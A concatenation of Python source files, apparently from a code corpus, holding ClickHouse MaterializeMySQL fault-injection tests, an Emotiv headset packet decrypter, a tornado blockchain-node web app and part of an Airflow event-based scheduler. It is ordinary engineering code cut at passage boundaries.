"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializeMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializeMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
get_sync_id_query = "select id from information_schema.processlist where STATE='Master has sent all binlog to slave; waiting for more updates'"
result = mysql_node.query_and_get_data(get_sync_id_query)
for row in result:
row_result = {}
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException) as exception:
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread. In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals:
time.sleep(3)
clickhouse_node.query("SELECT * FROM test_database.test_table")
assert "Cannot read all data" in str(exception.value)
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializeMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
run_and_check(
['docker-compose', '-p', mysql_node.project_name, '-f', mysql_node.docker_compose, 'stop'])
finally:
with pytest.raises(QueryRuntimeException) as execption:
time.sleep(5)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
assert "Master maybe lost." in str(execption.value)
run_and_check(
['docker-compose', '-p', mysql_node.project_name, '-f', mysql_node.docker_compose, 'start'])
mysql_node.wait_mysql_to_start(120)
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializeMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializeMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
|
decrypter.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import os
import sys
import time
from threading import Lock, Thread
from Crypto.Cipher import AES
from .python_queue import Queue
from .util import crypto_key, epoc_plus_crypto_key, new_crypto_key
class EmotivCrypto:
def __init__(self, serial_number=None, is_research=False, verbose=False, force_epoc_mode=False,
force_old_crypto=False):
"""
Performs decryption of packets received. Stores decrypted packets in a Queue for use.
:param serial_number - The serial number to use for AES key generation.
:param is_research - Is this a research edition headset? Also, EPOC+ uses this now.
"""
# Where the encrypted data is Queued.
self._encrypted_queue = Queue()
# Where the decrypted data is Queued.
self._decrypted_queue = Queue()
self.force_epoc_mode = force_epoc_mode
self.force_old_crypto = force_old_crypto
# Running state.
self.running = False
self.verbose = verbose
# Stop signal tells the loop to stop after processing remaining tasks.
self._stop_signal = False
# The emotiv serial number.
self.serial_number = serial_number
# EPOC+ and research edition may need to have this set to True
# TODO: Add functions that check variance in data received. If extreme toggle is_research and check again.
# If extreme again raise exception and shutdown emokit.
self.is_research = is_research
self.lock = Lock()
self.thread = Thread(target=self.run)
self.thread.setDaemon(True)
def run(self):
"""
The crypto loop. Decrypts data in encrypted Queue and puts it onto the decrypted Queue.
Do not call explicitly, use .start() instead.
"""
# Initialize AES
cipher = self.new_cipher(self.verbose)
self.lock.acquire()
while self.running:
self.lock.release()
# While the encrypted queue is not empty.
while not self._encrypted_queue.empty():
# Get some encrypted data off of the encrypted Queue.
encrypted_task = self._encrypted_queue.get()
# Make sure the encrypted data is not None.
if encrypted_task is not None:
# Make sure the encrypted data is not empty.
if encrypted_task.data is not None:
if len(encrypted_task.data):
try:
# Python 3 compatibility
if sys.version_info >= (3, 0):
# Convert to byte array or bytes like object.
encrypted_data = bytes(encrypted_task.data, encoding='latin-1')
else:
encrypted_data = encrypted_task.data
# Decrypt the encrypted data.
decrypted_data = decrypt_data(cipher, encrypted_data)
# Put the decrypted data onto the decrypted Queue.
encrypted_task.data = decrypted_data
self._decrypted_queue.put_nowait(encrypted_task)
except Exception as ex:
# Catch everything, and print exception.
# TODO: Make this more specific perhaps?
print(
"Emotiv CryptoError ", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2],
" : ",
ex)
# If stop signal is received and all the pending data in the encrypted Queue is processed, stop running.
self.lock.acquire()
if self._stop_signal and self._encrypted_queue.empty():
print("Crypto thread stopping.")
self.running = False
time.sleep(0.00001)
self.lock.release()
def start(self):
"""
Starts the crypto thread.
"""
self.running = True
self.thread.start()
def stop(self):
"""
Stops the crypto thread.
"""
self.lock.acquire()
self._stop_signal = True
self.lock.release()
self.thread.join(60)
def new_cipher(self, verbose=False):
"""
Generates a new AES cipher from the serial number and headset version.
:return: New AES cipher
"""
if verbose:
print("EmotivCrypto: Generating new AES cipher.")
# Create initialization vector.
iv = os.urandom(AES.block_size)
# Make sure the serial number was set.
if self.serial_number is None:
raise ValueError("Serial number must not be None.")
if verbose:
print("EmotivCrypto: Serial Number - {serial_number}".format(serial_number=self.serial_number))
# Create and return new AES class, using the serial number and headset version.
if self.serial_number.startswith('UD2016') and not self.force_old_crypto:
if self.force_epoc_mode:
return AES.new(epoc_plus_crypto_key(self.serial_number), AES.MODE_ECB, iv)
else:
return AES.new(new_crypto_key(self.serial_number, self.verbose))
else:
return AES.new(crypto_key(self.serial_number, self.is_research, verbose), AES.MODE_ECB, iv)
def add_task(self, data):
"""
Gives the crypto thread some encrypted data to decrypt, unless the crypto class' _stop_signal is True.
:param data: Encrypted Data
"""
# If the stop signal has not been set yet.
if not self._stop_signal:
# Add encrypted data to the encrypted Queue.
self._encrypted_queue.put_nowait(data)
def get_data(self):
"""
Gives decrypted data from the crypto thread, if the queue isn't empty.
:return: Decrypted data or None
"""
# If the decrypted queue is not empty, get data from the Queue and return it.
if not self._decrypted_queue.empty():
return self._decrypted_queue.get_nowait()
# Otherwise, return None.
return None
def data_ready(self):
"""
:return: If queue is not empty, return True
"""
if not self._decrypted_queue.empty():
return True
return False
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Do cleanup stuff.
:param exc_type:
:param exc_val:
:param exc_tb:
:return:
"""
self.stop()
def decrypt_data(cipher, data):
"""
Returns decrypted data.
:param cipher: AES cipher
:param data: Encrypted Data
:return: Decrypted Data
"""
return cipher.decrypt(data[:16]) + cipher.decrypt(data[16:])
|
node.py | from __future__ import print_function
import time
import socket
import subprocess
import argparse
import uuid
import base64
import threading
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
# import tornado.httpclient
# import tornado.websocket
import tornado.gen
import tornado.escape
import setting
import tree
import miner
import chain
import database
# import fs
# import msg
class Application(tornado.web.Application):
def __init__(self):
handlers = [(r"/node", tree.NodeHandler),
(r"/miner", tree.MinerHandler),
(r"/available_branches", AvailableBranchesHandler),
(r"/get_node", GetNodeHandler),
(r"/get_highest_block", chain.GetHighestBlockHandler),
(r"/get_block", chain.GetBlockHandler),
(r"/get_proof", chain.GetProofHandler),
(r"/get_highest_subchain_block", chain.GetHighestSubchainBlockHandler),
(r"/get_subchain_block", chain.GetSubchainBlockHandler),
(r"/new_subchain_block", NewSubchainBlockHandler),
(r"/dashboard", DashboardHandler),
(r"/chain_explorer", ChainExplorerHandler),
(r"/subchain_explorer", SubchainExplorerHandler),
(r"/user_explorer", UserExplorerHandler),
# (r"/disconnect", DisconnectHandler),
# (r"/broadcast", BroadcastHandler),
]
settings = {"debug":True}
tornado.web.Application.__init__(self, handlers, **settings)
class AvailableBranchesHandler(tornado.web.RequestHandler):
def get(self):
branches = list(tree.available_branches)
# parent = tree.NodeConnector.node_parent:
self.finish({"available_branches": branches,
#"parent": parent,
"nodeid": tree.current_nodeid})
class GetNodeHandler(tornado.web.RequestHandler):
def get(self):
nodeid = self.get_argument("nodeid")
target_nodeid = nodeid
score = None
address = [tree.current_host, tree.current_port]
# print(tree.current_port, tree.node_neighborhoods)
for j in [tree.node_neighborhoods, tree.node_parents]:
for i in j:
new_score = tree.node_distance(nodeid, i)
if score is None or new_score < score:
score = new_score
target_nodeid = i
address = j[target_nodeid]
# print(i, new_score)
self.finish({"address": address,
"nodeid": target_nodeid,
"current_nodeid": tree.current_nodeid})
class DisconnectHandler(tornado.web.RequestHandler):
def get(self):
if tree.NodeConnector.node_parent:
# connector.remove_node = False
tree.NodeConnector.node_parent.close()
self.finish({})
tornado.ioloop.IOLoop.instance().stop()
class BroadcastHandler(tornado.web.RequestHandler):
def get(self):
test_msg = ["TEST_MSG", tree.current_nodeid, time.time(), uuid.uuid4().hex]
tree.forward(test_msg)
self.finish({"test_msg": test_msg})
class NewSubchainBlockHandler(tornado.web.RequestHandler):
def post(self):
block = tornado.escape.json_decode(self.request.body)
chain.new_subchain_block(["NEW_SUBCHAIN_BLOCK"] + block)
tree.forward(["NEW_SUBCHAIN_BLOCK"] + block) # + [time.time(), uuid.uuid4().hex]
self.finish({"block": block})
class DashboardHandler(tornado.web.RequestHandler):
def get(self):
branches = list(tree.available_branches)
branches.sort(key=lambda l:len(l[2]))
parents = []
self.write("<a href='/chain_explorer'>Chain Explorer</a> ")
self.write("<a href='/user_explorer'>User Explorer</a></br>")
self.write("<br>current_nodeid: %s <br>" % tree.current_nodeid)
self.write("<br>pk: %s <br>" % base64.b32encode(tree.node_sk.get_verifying_key().to_string()).decode("utf8"))
# sender = base64.b32encode(sender_vk.to_string()).decode("utf8")
self.write("<br>node_parent:<br>")
if tree.NodeConnector.node_parent:
self.write("%s:%s<br>" %(tree.NodeConnector.node_parent.host, tree.NodeConnector.node_parent.port))
self.write("<br>node_parents:<br>")
for nodeid in tree.node_parents:
host, port = tree.node_parents[nodeid]
self.write("%s %s:%s<br>" %(nodeid, host, port))
self.write("<br>node_neighborhoods:<br>")
for nodeid in tree.node_neighborhoods:
host, port = tree.node_neighborhoods[nodeid]
self.write("%s %s:%s <a href='http://%s:%s/dashboard'>dashboard</a><br>" %(nodeid, host, port, host, port))
self.write("<br>recent longest:<br>")
for i in reversed(chain.recent_longest):
self.write("%s <a href='/get_block?hash=%s'>%s</a> %s<br>" % (i[3], i[1], i[1], i[6]))
self.write("<br>nodes_pool:<br>")
for nodeid in tree.nodes_pool:
pk = tree.nodes_pool[nodeid]
self.write("%s: %s<br>" %(nodeid, pk))
self.write("<br>nodes_in_chain:<br>")
for nodeid in chain.nodes_in_chain:
pk = chain.nodes_in_chain[nodeid]
self.write("%s: %s<br>" %(nodeid, pk))
self.write("<br>frozen_nodes_in_chain:<br>")
for nodeid in chain.frozen_nodes_in_chain:
pk = chain.frozen_nodes_in_chain[nodeid]
self.write("%s: %s<br>" %(nodeid, pk))
self.write("<br>available_branches:<br>")
for branch in branches:
self.write("%s:%s %s <br>" % branch)
self.write("<br>frozen chain:<br>")
for i, h in enumerate(chain.frozen_chain):
self.write("%s <a href='/get_block?hash=%s'>%s</a><br>" % (i, h, h))
self.finish()
class ChainExplorerHandler(tornado.web.RequestHandler):
def get(self):
height = self.get_argument('height', 1)
self.write("<a href='/dashboard'>Dashboard</a> ")
self.write("<a href='/user_explorer'>User Explorer</a></br>")
self.write("<a href='/chain_explorer?height=%s'>Prev</a> " % (int(height)-1, ))
self.write("<a href='/chain_explorer?height=%s'>Next</a><br>" % (int(height)+1, ))
conn = database.get_conn()
c = conn.cursor()
c.execute("SELECT * FROM chain WHERE height = ?", (height, ))
blocks = c.fetchall()
for block in blocks:
self.write("<code>%s</code><br>" % str(block))
class SubchainExplorerHandler(tornado.web.RequestHandler):
def get(self):
sender = self.get_argument('sender')
height = self.get_argument('height', 1)
self.write("<a href='/dashboard'>Dashboard</a> ")
self.write("<a href='/chain_explorer'>Chain Explorer</a> ")
self.write("<a href='/user_explorer'>User Explorer</a></br>")
self.write("<a href='/subchain_explorer?height=%s&sender=%s'>Prev</a> " % (int(height)-1, sender))
self.write("<a href='/subchain_explorer?height=%s&sender=%s'>Next</a><br>" % (int(height)+1, sender))
conn = database.get_conn()
c = conn.cursor()
c.execute("SELECT * FROM subchains WHERE sender = ? AND height = ?", (sender, height))
blocks = c.fetchall()
for block in blocks:
self.write("<code>%s</code><br>" % str(block))
class UserExplorerHandler(tornado.web.RequestHandler):
def get(self):
conn = database.get_conn()
c = conn.cursor()
c.execute("SELECT DISTINCT(sender) FROM subchains")
senders = c.fetchall()
self.write("<a href='/dashboard'>Dashboard</a> ")
self.write("<a href='/chain_explorer'>Chain Explorer</a> <br>")
for sender in senders:
self.write("<a href='/subchain_explorer?sender=%s'>%s</a><br>"% (sender[0], sender[0]))
def main():
tree.main()
# miner.main()
tornado.ioloop.IOLoop.instance().call_later(1, miner.looping)
# leader.main()
# tornado.ioloop.IOLoop.instance().call_later(1, leader.mining)
# fs.main()
worker_threading = threading.Thread(target=miner.worker_thread)
worker_threading.start()
chain.worker_thread_pause = False
server = Application()
server.listen(tree.current_port, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
worker_threading.join()
if __name__ == '__main__':
main()
|
event_based_scheduler_job.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
event.dag_id, event.dag_run_id))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._remove_periodic_events(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
event.dag_id, event.execution_date))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _remove_periodic_events(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
if not dagruns:
self.log.warning(f'Gets no dagruns to remove periodic events with dag_id: {dag_id} '
f'and execution_date: {execution_date}.')
else:
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun)\
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
